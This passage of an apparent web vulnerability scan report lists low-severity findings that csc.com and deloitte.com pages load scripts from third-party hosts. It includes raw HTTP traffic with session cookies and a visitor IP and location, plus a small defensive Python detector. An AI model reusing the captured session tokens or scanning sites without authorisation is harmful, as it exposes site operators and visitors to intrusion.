Cookie: BIGipServerwww.CSC.Com_HTTP-9000_Pool=1150396288.10275.0000; s_vi=[CS]v1|2733217B8516386C-600001A40000394C[CE]; visitor_info=country%3DUS%26region%3DTX%26city%3DDallas%26latitude%3D32.7825012207031%26longitude%3D-96.8207015991211%26domain%3Dsoftlayer.com%26organization%3DSoftLayer%2BTechnologies%26ip%3D50.23.123.106%26language%3Den-US%26http_user_agent%3DMozilla%252F5.0%2B%2528Windows%2BNT%2B6.1%253B%2BWOW64%2529%2BAppleWebKit%252F535.1%2B%2528KHTML%252C%2Blike%2BGecko%2529%2BChrome%252F13.0.782.220%2BSafari%252F535.1; _session=BAh7BjoPc2Vzc2lvbl9pZCIlZDQ3ZTkwZTY4MTZhNjllNmJiMTU4ZWFkOTk1N2NlYjU%3D--7d3a5af62ef35b69f0a33d9e8e51b9af33cdc6a0; visitor_action=referrer%3Dwww.oracle.com%2Fopenworld%2Ftools%2Fmobile%2Findex.html%26content_id%3D29513%26internal_search%3Dxss%26traffic_source%3Ddirect%2Cdirect%2Creferral%26zone_id%3D509%26content_type_id%3D13%26visits%3D1; subexpandable=-1c; s_sess=%20ev4%3Dxss%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=253059739.694282920.1315342663.1315342663.1315342663.1; __utmb=253059739.5.10.1315342663; __utmc=253059739; __utmz=253059739.1315342663.1.1.utmcsr=oracle.com|utmccn=(referral)|utmcmd=referral|utmcct=/openworld/tools/mobile/index.html; IPE_S_26841=26841

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:09:21 GMT
Server: Apache
Last-Modified: Tue, 06 Sep 2011 16:09:20 GMT
Accept-Ranges: bytes
Cache-Control: max-age=86400
Expires: Wed, 07 Sep 2011 16:09:21 GMT
Vary: Accept-Encoding
Content-Length: 9442
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
</script><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...
</script>
<SCRIPT type="text/javascript" src="//rd.clickshift.com/js/convert.js"></SCRIPT>
...[SNIP]...

20.92. http://www.csc.com/contact_us

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.csc.com
Path:   /contact_us

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /contact_us HTTP/1.1
Host: www.csc.com
Proxy-Connection: keep-alive
Referer: http://www.csc.com/services
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.CSC.Com_HTTP-9000_Pool=1150396288.10275.0000; s_vi=[CS]v1|2733217B8516386C-600001A40000394C[CE]; visitor_info=country%3DUS%26region%3DTX%26city%3DDallas%26latitude%3D32.7825012207031%26longitude%3D-96.8207015991211%26domain%3Dsoftlayer.com%26organization%3DSoftLayer%2BTechnologies%26ip%3D50.23.123.106%26language%3Den-US%26http_user_agent%3DMozilla%252F5.0%2B%2528Windows%2BNT%2B6.1%253B%2BWOW64%2529%2BAppleWebKit%252F535.1%2B%2528KHTML%252C%2Blike%2BGecko%2529%2BChrome%252F13.0.782.220%2BSafari%252F535.1; _session=BAh7BjoPc2Vzc2lvbl9pZCIlZDQ3ZTkwZTY4MTZhNjllNmJiMTU4ZWFkOTk1N2NlYjU%3D--7d3a5af62ef35b69f0a33d9e8e51b9af33cdc6a0; visitor_action=referrer%3Dwww.oracle.com%2Fopenworld%2Ftools%2Fmobile%2Findex.html%26content_id%3D29513%26internal_search%3Dxss%26traffic_source%3Ddirect%2Cdirect%2Creferral%26zone_id%3D509%26content_type_id%3D13%26visits%3D1; subexpandable=-1c; __utma=253059739.694282920.1315342663.1315342663.1315342663.1; __utmb=253059739.3.10.1315342663; __utmc=253059739; __utmz=253059739.1315342663.1.1.utmcsr=oracle.com|utmccn=(referral)|utmcmd=referral|utmcct=/openworld/tools/mobile/index.html; IPE_S_26841=26841; s_sess=%20ev4%3Dxss%3B%20s_cc%3Dtrue%3B%20s_sq%3Dcsccom%253D%252526pid%25253DServices%2525253AHome%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.csc.com/contact_us%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:09:11 GMT
Server: Apache
Last-Modified: Tue, 06 Sep 2011 16:01:52 GMT
Accept-Ranges: bytes
Cache-Control: max-age=86400
Expires: Wed, 07 Sep 2011 16:09:11 GMT
Vary: Accept-Encoding
Content-Length: 14011
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
</script>
<SCRIPT type="text/javascript" src="//rd.clickshift.com/js/convert.js"></SCRIPT>
...[SNIP]...
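Every finding in this part of the report (20.92 onward) is the same class of issue: the page loads a <script src> from a host other than the one serving it, so whoever controls that host, or can tamper with a plaintext fetch of it, runs code in the page's origin. As an added example, not part of the XSS.CX report or of Burp's output, the Python below reproduces that check over a constructed HTML sample modelled on the includes shown for www.csc.com. It resolves each src against the page URL, flags hosts that differ from the page's host, records the scheme a protocol-relative `//host/path` include actually resolves to (http whenever the page itself is http, as in these findings), and accepts an allowlist of same-operator hosts so that first-party CDNs (the static.ak.fbcdn.net includes on www.facebook.com in 20.104 are that case) can be excluded. The sample markup and the allowlist are constructed for illustration, not captured from the sites.

```python
"""Detect cross-domain <script src> includes in an HTML response.

Added example; not part of the XSS.CX/Burp report. SAMPLE_HTML below is
constructed from the kinds of includes the report shows (protocol-relative
//host/path and absolute http://host/path) and is not a captured response.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> element.

    HTMLParser hands tag and attribute names to us already lower-cased, so
    <SCRIPT ... src=...> and <script ... src=...> are treated alike.
    """

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            for name, value in attrs:
                if name == "src" and value:
                    self.srcs.append(value)


def _is_trusted(host, trusted_hosts):
    """True if host equals, or is a subdomain of, an allowlisted host."""
    return any(host == t or host.endswith("." + t) for t in trusted_hosts)


def cross_domain_scripts(page_url, html, trusted_hosts=()):
    """Return (absolute_url, host, scheme) for each script served from another host.

    urljoin resolves a protocol-relative '//host/x' with the page's scheme, so an
    http:// page fetches such scripts over plaintext http even though the markup
    looks scheme-neutral. Hosts in trusted_hosts (same-operator CDNs) are skipped.
    """
    page_host = urlsplit(page_url).hostname.lower()
    parser = ScriptSrcCollector()
    parser.feed(html)
    found = []
    for src in parser.srcs:
        absolute = urljoin(page_url, src.strip())
        parts = urlsplit(absolute)
        host = (parts.hostname or "").lower()
        if not host or host == page_host or _is_trusted(host, trusted_hosts):
            continue
        found.append((absolute, host, parts.scheme))
    return found


def plaintext_third_party(page_url, html, trusted_hosts=()):
    """Subset of cross-domain scripts the browser will fetch over plaintext http."""
    return [url for url, _host, scheme in cross_domain_scripts(page_url, html, trusted_hosts)
            if scheme == "http"]


# Constructed sample, modelled on the includes the report lists for www.csc.com pages.
SAMPLE_PAGE_URL = "http://www.csc.com/contact_us"
SAMPLE_HTML = """
<html><head>
<script type="text/javascript" src="/js/site.js"></script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
<SCRIPT type="text/javascript" src="//rd.clickshift.com/js/convert.js"></SCRIPT>
<script src="https://secure.quantserve.com/quant.js"></script>
</head><body></body></html>
"""


if __name__ == "__main__":
    for url, host, scheme in cross_domain_scripts(SAMPLE_PAGE_URL, SAMPLE_HTML):
        print(f"{scheme:5} {host:25} {url}")
```

Run against a saved response body to list every third-party script host; the entries returned with scheme "http" are the ones an on-path attacker could replace, which is a sharper statement of risk than the bare "another domain" wording in the finding.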

20.93. http://www.csc.com/credit_services/contact_us/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.csc.com
Path:   /credit_services/contact_us/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /credit_services/contact_us/ HTTP/1.1
Host: www.csc.com
Proxy-Connection: keep-alive
Referer: http://www.csc.com/contact_us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.CSC.Com_HTTP-9000_Pool=1150396288.10275.0000; s_vi=[CS]v1|2733217B8516386C-600001A40000394C[CE]; visitor_info=country%3DUS%26region%3DTX%26city%3DDallas%26latitude%3D32.7825012207031%26longitude%3D-96.8207015991211%26domain%3Dsoftlayer.com%26organization%3DSoftLayer%2BTechnologies%26ip%3D50.23.123.106%26language%3Den-US%26http_user_agent%3DMozilla%252F5.0%2B%2528Windows%2BNT%2B6.1%253B%2BWOW64%2529%2BAppleWebKit%252F535.1%2B%2528KHTML%252C%2Blike%2BGecko%2529%2BChrome%252F13.0.782.220%2BSafari%252F535.1; subexpandable=-1c; visitor_action=referrer%3Dwww.oracle.com%2Fopenworld%2Ftools%2Fmobile%2Findex.html%26internal_search%3Dxss%26content_id%3D29513%26zone_id%3D509%26traffic_source%3Ddirect%2Cdirect%2Cdirect%2Creferral%26content_type_id%3D13%26visits%3D1; s_sess=%20ev4%3Dxss%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=253059739.694282920.1315342663.1315342663.1315342663.1; __utmb=253059739.6.10.1315342663; __utmc=253059739; __utmz=253059739.1315342663.1.1.utmcsr=oracle.com|utmccn=(referral)|utmcmd=referral|utmcct=/openworld/tools/mobile/index.html; IPE_S_26841=26841; _session=BAh7BjoPc2Vzc2lvbl9pZCIlZDQ3ZTkwZTY4MTZhNjllNmJiMTU4ZWFkOTk1N2NlYjU%3D--7d3a5af62ef35b69f0a33d9e8e51b9af33cdc6a0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:09:24 GMT
ETag: "4e6645b3-2079-52cbe9"
Last-Modified: Tue, 06 Sep 2011 16:09:23 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=86400
Expires: Wed, 07 Sep 2011 16:09:24 GMT
Vary: Accept-Encoding
Content-Length: 8313

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
</script><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...
</script>
<SCRIPT type="text/javascript" src="//rd.clickshift.com/js/convert.js"></SCRIPT>
...[SNIP]...

20.94. http://www.csc.com/cybersecurity/contact_us

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.csc.com
Path:   /cybersecurity/contact_us

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /cybersecurity/contact_us HTTP/1.1
Host: www.csc.com
Proxy-Connection: keep-alive
Referer: http://www.csc.com/contact_us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.CSC.Com_HTTP-9000_Pool=1150396288.10275.0000; s_vi=[CS]v1|2733217B8516386C-600001A40000394C[CE]; visitor_info=country%3DUS%26region%3DTX%26city%3DDallas%26latitude%3D32.7825012207031%26longitude%3D-96.8207015991211%26domain%3Dsoftlayer.com%26organization%3DSoftLayer%2BTechnologies%26ip%3D50.23.123.106%26language%3Den-US%26http_user_agent%3DMozilla%252F5.0%2B%2528Windows%2BNT%2B6.1%253B%2BWOW64%2529%2BAppleWebKit%252F535.1%2B%2528KHTML%252C%2Blike%2BGecko%2529%2BChrome%252F13.0.782.220%2BSafari%252F535.1; subexpandable=-1c; __utma=253059739.694282920.1315342663.1315342663.1315342663.1; __utmb=253059739.6.10.1315342663; __utmc=253059739; __utmz=253059739.1315342663.1.1.utmcsr=oracle.com|utmccn=(referral)|utmcmd=referral|utmcct=/openworld/tools/mobile/index.html; IPE_S_26841=26841; _session=BAh7BjoPc2Vzc2lvbl9pZCIlZDQ3ZTkwZTY4MTZhNjllNmJiMTU4ZWFkOTk1N2NlYjU%3D--7d3a5af62ef35b69f0a33d9e8e51b9af33cdc6a0; visitor_action=referrer%3Dwww.oracle.com%2Fopenworld%2Ftools%2Fmobile%2Findex.html%26content_id%3D29513%26internal_search%3Dxss%26traffic_source%3Ddirect%2Cdirect%2Cdirect%2Cdirect%2Creferral%26zone_id%3D509%26content_type_id%3D13%26visits%3D1; s_sess=%20ev4%3Dxss%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:09:26 GMT
Status: 200
ETag: "4c56494684a77f8dc752e50b92174ca2"
X-Cache: MISS
X-Runtime: 47
Content-Type: text/html; charset=utf-8
Cache-Control: private, max-age=0, must-revalidate, max-age=86400
Set-Cookie: visitor_action=referrer%3Dwww.oracle.com%2Fopenworld%2Ftools%2Fmobile%2Findex.html%26content_id%3D29513%26internal_search%3Dxss%26traffic_source%3Ddirect%2Cdirect%2Cdirect%2Cdirect%2Cdirect%2Cdirect%2Creferral%26zone_id%3D509%26content_type_id%3D13%26visits%3D1; path=/; expires=Thu, 06-Oct-2011 16:09:26 GMT
Expires: Wed, 07 Sep 2011 16:09:26 GMT
Vary: Accept-Encoding
Content-Length: 8060

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
</script><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...
</script>
<SCRIPT type="text/javascript" src="//rd.clickshift.com/js/convert.js"></SCRIPT>
...[SNIP]...

20.95. http://www.deloitte.com/view/en_US/us/Contact-us/email-us/index.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.deloitte.com
Path:   /view/en_US/us/Contact-us/email-us/index.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /view/en_US/us/Contact-us/email-us/index.htm HTTP/1.1
Host: www.deloitte.com
Proxy-Connection: keep-alive
Referer: http://www.deloitte.com/view/en_US/us/Contact-us/index.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-928200600-1315342618637; s_vi=[CS]v1|27332165051D18B6-4000013520016CC4[CE]; BIGipServerwww64.deloitte.com=50851850.36895.0000; s_vnum=1747342618651%26vn%3D2; JSESSIONID=WGW1TmPf5K1hhvSxmVygzvtch6pn6HsRCtV116TYKr7FcvQTJkvN!-755750050; SITESERVER=ID=0120f21d112bdebcef542549eb84e28a; __utma=55230644.1519156675.1315342619.1315342619.1315345938.2; __utmb=55230644.16.10.1315345938; __utmc=55230644; __utmz=55230644.1315345938.2.2.utmcsr=oracle.com|utmccn=(referral)|utmcmd=referral|utmcct=/openworld/tools/mobile/index.html; s_cc=true; s_ppv=86; SC_LINKS=us%3Acontact%5E%5Eemail%20form%5E%5Eus%3Acontact%20%7C%20email%20form%5E%5E; s_nr=1315345973568-Repeat; s_invisit=true; s_ppg=us%3Acontact; s_sq=deloittecomnewplatformprod%3D%2526pid%253Dus%25253Acontact%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.deloitte.com%25252Fview%25252Fen_US%25252Fus%25252FContact-us%25252Femail-us%25252Findex.htm_2%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:52:55 GMT
Content-Length: 56425
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link href="/vgn-ext-templating/common/styles/
...[SNIP]...
<!-- Begin: www.iperceptions.com --><script defer="defer" type="text/javascript" src="https://ips-invite.iperceptions.com/webValidator.aspx?sdfc=225de72b-25001-dc122be4-e6ff-4f0b-866a-51f79b5e757f&lID=1&loc=4Q-WEB2&cD=90&rF=False&iType=1&domainname=0"></script>
...[SNIP]...
</script> <script src="//secure.quantserve.com/quant.js" type="text/javascript"></script>
...[SNIP]...

20.96. http://www.deloitte.com/view/en_US/us/Contact-us/index.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.deloitte.com
Path:   /view/en_US/us/Contact-us/index.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /view/en_US/us/Contact-us/index.htm HTTP/1.1
Host: www.deloitte.com
Proxy-Connection: keep-alive
Referer: http://www.deloitte.com/view/en_US/us/Industries/Telecom-Telecommunications-Technology/a1a6da8d60fd4210VgnVCM200000bb42f00aRCRD.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-928200600-1315342618637; s_vi=[CS]v1|27332165051D18B6-4000013520016CC4[CE]; BIGipServerwww64.deloitte.com=50851850.36895.0000; s_vnum=1747342618651%26vn%3D2; JSESSIONID=WGW1TmPf5K1hhvSxmVygzvtch6pn6HsRCtV116TYKr7FcvQTJkvN!-755750050; SITESERVER=ID=0120f21d112bdebcef542549eb84e28a; __utma=55230644.1519156675.1315342619.1315342619.1315345938.2; __utmb=55230644.14.10.1315345938; __utmc=55230644; __utmz=55230644.1315345938.2.2.utmcsr=oracle.com|utmccn=(referral)|utmcmd=referral|utmcct=/openworld/tools/mobile/index.html; s_cc=true; s_ppv=72; SC_LINKS=us%3Aind%3Atelecom%3Athe%20broadband%20stimulus%20program%3A%20are%20you%20prepared%20to%20explore%20untapped%20opportunities%3F%5E%5EContact%5E%5Eus%3Aind%3Atelecom%3Athe%20broadband%20stimulus%20program%3A%20are%20you%20prepared%20to%20explore%20untapped%20opportunities%3F%20%7C%20Contact%5E%5E; s_nr=1315345969717-Repeat; s_invisit=true; s_ppg=us%3Aind%3Atelecom%3Athe%20broadband%20stimulus%20program%3A%20are%20you%20prepared%20to%20explore%20untapped%20opportunities%3F; s_sq=deloittecomnewplatformprod%3D%2526pid%253Dus%25253Aind%25253Atelecom%25253Athe%252520broadband%252520stimulus%252520program%25253A%252520are%252520you%252520prepared%252520to%252520explore%252520untapped%252520opportunities%25253F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.deloitte.com%25252Fview%25252Fen_US%25252Fus%25252FContact-us%25252Findex.htm_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:52:50 GMT
Content-Length: 42467
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link href="/vgn-ext-templating/common/styles/
...[SNIP]...
<!-- Begin: www.iperceptions.com --><script defer="defer" type="text/javascript" src="https://ips-invite.iperceptions.com/webValidator.aspx?sdfc=225de72b-25001-dc122be4-e6ff-4f0b-866a-51f79b5e757f&lID=1&loc=4Q-WEB2&cD=90&rF=False&iType=1&domainname=0"></script>
...[SNIP]...
</script> <script src="//secure.quantserve.com/quant.js" type="text/javascript"></script>
...[SNIP]...

20.97. http://www.deloitte.com/view/en_US/us/Industries/Telecom-Telecommunications-Technology/a1a6da8d60fd4210VgnVCM200000bb42f00aRCRD.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.deloitte.com
Path:   /view/en_US/us/Industries/Telecom-Telecommunications-Technology/a1a6da8d60fd4210VgnVCM200000bb42f00aRCRD.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /view/en_US/us/Industries/Telecom-Telecommunications-Technology/a1a6da8d60fd4210VgnVCM200000bb42f00aRCRD.htm HTTP/1.1
Host: www.deloitte.com
Proxy-Connection: keep-alive
Referer: http://www.deloitte.com/view/en_US/us/search/index.htm?&c=&d=0&sw=0&l=-1&pi=1&q=broadband&st=&sl=&s=0&ct=0&et=0&ec=1&m=0&ps=0&type=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-928200600-1315342618637; s_vi=[CS]v1|27332165051D18B6-4000013520016CC4[CE]; BIGipServerwww64.deloitte.com=50851850.36895.0000; s_vnum=1747342618651%26vn%3D2; JSESSIONID=WGW1TmPf5K1hhvSxmVygzvtch6pn6HsRCtV116TYKr7FcvQTJkvN!-755750050; SITESERVER=ID=0120f21d112bdebcef542549eb84e28a; __utma=55230644.1519156675.1315342619.1315342619.1315345938.2; __utmb=55230644.12.10.1315345938; __utmc=55230644; __utmz=55230644.1315345938.2.2.utmcsr=oracle.com|utmccn=(referral)|utmcmd=referral|utmcct=/openworld/tools/mobile/index.html; s_cc=true; s_ppv=48; SC_LINKS=us%3Asearch%5E%5EThe%20Broadband%20Stimulus%20Program%3A%20Are%20You%20Prepared%20to%20Explore%20Untapped%20Opportunities%3F%5E%5Eus%3Asearch%20%7C%20The%20Broadband%20Stimulus%20Program%3A%20Are%20You%20Prepared%20to%20Explore%20Untapped%20Opportunities%3F%5E%5E; s_nr=1315345965774-Repeat; s_invisit=true; s_ppg=us%3Asearch; s_sq=deloittecomnewplatformprod%3D%2526pid%253Dus%25253Asearch%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.deloitte.com%25252Fview%25252Fen_US%25252Fus%25252FIndustries%25252FTelecom-Telecommunications-Technology%25252Fa1a6da8d60_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:52:47 GMT
Content-Length: 51520
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link href="/vgn-ext-templating/common/styles/
...[SNIP]...
<!-- Begin: www.iperceptions.com --><script defer="defer" type="text/javascript" src="https://ips-invite.iperceptions.com/webValidator.aspx?sdfc=225de72b-25001-dc122be4-e6ff-4f0b-866a-51f79b5e757f&lID=1&loc=4Q-WEB2&cD=90&rF=False&iType=1&domainname=0"></script>
...[SNIP]...
</script> <script src="//secure.quantserve.com/quant.js" type="text/javascript"></script>
...[SNIP]...

20.98. http://www.deloitte.com/view/en_US/us/Industries/index.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.deloitte.com
Path:   /view/en_US/us/Industries/index.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /view/en_US/us/Industries/index.htm HTTP/1.1
Host: www.deloitte.com
Proxy-Connection: keep-alive
Referer: http://www.deloitte.com/view/en_US/us/search/index.htm?searchKeywordsField=Dbriefs&searchKeywordsFieldDefault=Search
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-928200600-1315342618637; s_vi=[CS]v1|27332165051D18B6-4000013520016CC4[CE]; BIGipServerwww64.deloitte.com=50851850.36895.0000; s_vnum=1747342618651%26vn%3D2; JSESSIONID=WGW1TmPf5K1hhvSxmVygzvtch6pn6HsRCtV116TYKr7FcvQTJkvN!-755750050; __utma=55230644.1519156675.1315342619.1315342619.1315345938.2; __utmb=55230644.2.10.1315345938; __utmc=55230644; __utmz=55230644.1315345938.2.2.utmcsr=oracle.com|utmccn=(referral)|utmcmd=referral|utmcct=/openworld/tools/mobile/index.html; s_cc=true; SITESERVER=ID=0120f21d112bdebcef542549eb84e28a; s_ppv=64; SC_LINKS=us%3Asearch%5E%5EIndustries%5E%5Eus%3Asearch%20%7C%20Industries%5E%5E; s_nr=1315345940094-Repeat; s_invisit=true; s_ppg=us%3Asearch; s_sq=deloittecomnewplatformprod%3D%2526pid%253Dus%25253Asearch%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.deloitte.com%25252Fview%25252Fen_US%25252Fus%25252FIndustries%25252Findex.htm_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 48127
Date: Tue, 06 Sep 2011 16:52:20 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link href="/vgn-ext-templating/common/styles/
...[SNIP]...
<!-- Begin: www.iperceptions.com --><script defer="defer" type="text/javascript" src="https://ips-invite.iperceptions.com/webValidator.aspx?sdfc=225de72b-25001-dc122be4-e6ff-4f0b-866a-51f79b5e757f&lID=1&loc=4Q-WEB2&cD=90&rF=False&iType=1&domainname=0"></script>
...[SNIP]...
</script> <script src="//secure.quantserve.com/quant.js" type="text/javascript"></script>
...[SNIP]...

20.99. http://www.deloitte.com/view/en_US/us/Insights/index.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.deloitte.com
Path:   /view/en_US/us/Insights/index.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /view/en_US/us/Insights/index.htm HTTP/1.1
Host: www.deloitte.com
Proxy-Connection: keep-alive
Referer: http://www.deloitte.com/view/en_US/us/Industries/index.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-928200600-1315342618637; s_vi=[CS]v1|27332165051D18B6-4000013520016CC4[CE]; BIGipServerwww64.deloitte.com=50851850.36895.0000; s_vnum=1747342618651%26vn%3D2; JSESSIONID=WGW1TmPf5K1hhvSxmVygzvtch6pn6HsRCtV116TYKr7FcvQTJkvN!-755750050; SITESERVER=ID=0120f21d112bdebcef542549eb84e28a; __utma=55230644.1519156675.1315342619.1315342619.1315345938.2; __utmb=55230644.4.10.1315345938; __utmc=55230644; __utmz=55230644.1315345938.2.2.utmcsr=oracle.com|utmccn=(referral)|utmcmd=referral|utmcct=/openworld/tools/mobile/index.html; s_cc=true; s_ppv=89; SC_LINKS=us%3Aind%5E%5EInsights%5E%5Eus%3Aind%20%7C%20Insights%5E%5E; s_nr=1315345942694-Repeat; s_invisit=true; s_ppg=us%3Aind; 